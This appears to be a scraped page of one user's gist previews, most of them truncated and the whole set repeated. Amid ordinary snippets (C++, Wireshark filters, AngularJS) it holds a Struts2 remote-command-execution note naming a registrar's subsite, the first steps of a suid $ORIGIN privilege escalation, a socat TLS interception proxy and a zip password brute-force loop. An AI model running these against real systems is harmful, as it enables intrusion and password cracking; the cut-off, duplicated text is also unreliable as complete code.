KINOSHITA Shinji snj

## gist:7078472
Japan's largest domain name registrar a subsite	remote command execution

*Abstract:*

Japan's largest domain name registrar a subsite remote command execution

Details：

Apache struts2 a vulnerability introduced by manipulating parameters
prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command

## gist:7078496
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target

## gist:7079322
#include <iostream>

void swap(int& a, int& b){
  b ^= a; a ^= b; b ^= a;
}

int main(){
  int a = 1, b = 2;
  swap(a, b);

## gist:7079339
1.       ip.addr == 10.0.0.1 [Sets a filter for any packet with 10.0.0.1, as either the source or dest]

2.       ip.addr==10.0.0.1  && ip.addr==10.0.0.2 [sets a conversation filter between the two defined IP addresses]

3.       http or dns [sets a filter to display all http and dns]

4.       tcp.port==4000 [sets a filter for any TCP packet with 4000 as a source or dest port]

5.       tcp.flags.reset==1 [displays all TCP resets]

## gist:7079345
openssl req -new -x509 -newkey rsa:1024 -out server.pem -keyout server.pem
socat -d -d openssl-listen:10443,reuseaddr,fork,cert=server.pem,verify=0 openssl:$target:443,verify=0

## gist:7079362
stop in jp.example.myapp.ExampleActivity.onCreate

adb wait-for-device shell am start -D -a android.intent.action.MAIN -n jp.example.myapp/.ExampleActivity

adb forward tcp:8888 jdwp:`adb jdwp|tail -1`

jdb -attach localhost:8888

## gist:7079756
$ time /opt/john-1.7.9-jumbo-7/run/john -i=digits --stdout|while read pw;do echo $pw;unzip -pqq -P $pw passwd.zip 2>&1 1>/dev/null && break;done

## gist:8276229
// Source: https://groups.google.com/forum/#!topic/angular/hVrkvaHGOfc
// jsFiddle: http://jsfiddle.net/pkozlowski_opensource/PxdSP/14/
// author: Pawel Kozlowski

var myApp = angular.module('myApp', []);

//service style, probably the simplest one
myApp.service('helloWorldFromService', function() {
    this.sayHello = function() {
        return "Hello, World!"

## tor exit
#!/usr/bin/env python2
import requests
from iso3166 import countries
url="http://example.com/path/to/it"
cookies = dict(session='dcd83eacd7b3518b0d5064ce957d606218cc15616ec72c18cd866a9972aca6fb')
data= requests.get(url,cookies=cookies,verify=False).content
lines = data.split('\n')
flags = []
for i in lines:
  if "inactive" in i:

## angular-socket.js
//TODO: make this a module

/**
 * # SockJS socket management service
 *
 * Creates SockJS socket connection to server, re-connects on disconnection,
 * and exports hooks to map handlers for various data interactions.
 *
 */
angular.module('app').factory
	Japan's largest domain name registrar a subsite remote command execution

	Abstract:

	Japan's largest domain name registrar a subsite remote command execution

	Details：

	Apache struts2 a vulnerability introduced by manipulating parameters
	prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command
	# Create a directory in /tmp we can control.
	$ mkdir /tmp/exploit

	# Link to an suid binary, thus changing the definition of $ORIGIN.
	$ ln /bin/ping /tmp/exploit/target

	# Open a file descriptor to the target binary (note: some users are surprised
	# to learn exec can be used to manipulate the redirections of the current
	# shell if a command is not specified. This is what is happening below).
	$ exec 3< /tmp/exploit/target
	#include <iostream>

	void swap(int& a, int& b){
	b ^= a; a ^= b; b ^= a;
	}

	int main(){
	int a = 1, b = 2;
	swap(a, b);
	1. ip.addr == 10.0.0.1 [Sets a filter for any packet with 10.0.0.1, as either the source or dest]

	2. ip.addr==10.0.0.1 && ip.addr==10.0.0.2 [sets a conversation filter between the two defined IP addresses]

	3. http or dns [sets a filter to display all http and dns]

	4. tcp.port==4000 [sets a filter for any TCP packet with 4000 as a source or dest port]

	5. tcp.flags.reset==1 [displays all TCP resets]
	openssl req -new -x509 -newkey rsa:1024 -out server.pem -keyout server.pem
	socat -d -d openssl-listen:10443,reuseaddr,fork,cert=server.pem,verify=0 openssl:$target:443,verify=0
	stop in jp.example.myapp.ExampleActivity.onCreate

	adb wait-for-device shell am start -D -a android.intent.action.MAIN -n jp.example.myapp/.ExampleActivity

	adb forward tcp:8888 jdwp:`adb jdwp\|tail -1`

	jdb -attach localhost:8888
	// Source: https://groups.google.com/forum/#!topic/angular/hVrkvaHGOfc
	// jsFiddle: http://jsfiddle.net/pkozlowski_opensource/PxdSP/14/
	// author: Pawel Kozlowski

	var myApp = angular.module('myApp', []);

	//service style, probably the simplest one
	myApp.service('helloWorldFromService', function() {
	this.sayHello = function() {
	return "Hello, World!"
	#!/usr/bin/env python2
	import requests
	from iso3166 import countries
	url="http://example.com/path/to/it"
	cookies = dict(session='dcd83eacd7b3518b0d5064ce957d606218cc15616ec72c18cd866a9972aca6fb')
	data= requests.get(url,cookies=cookies,verify=False).content
	lines = data.split('\n')
	flags = []
	for i in lines:
	if "inactive" in i:
	//TODO: make this a module

	/**
	* # SockJS socket management service
	*
	* Creates SockJS socket connection to server, re-connects on disconnection,
	* and exports hooks to map handlers for various data interactions.
	*
	*/
	angular.module('app').factory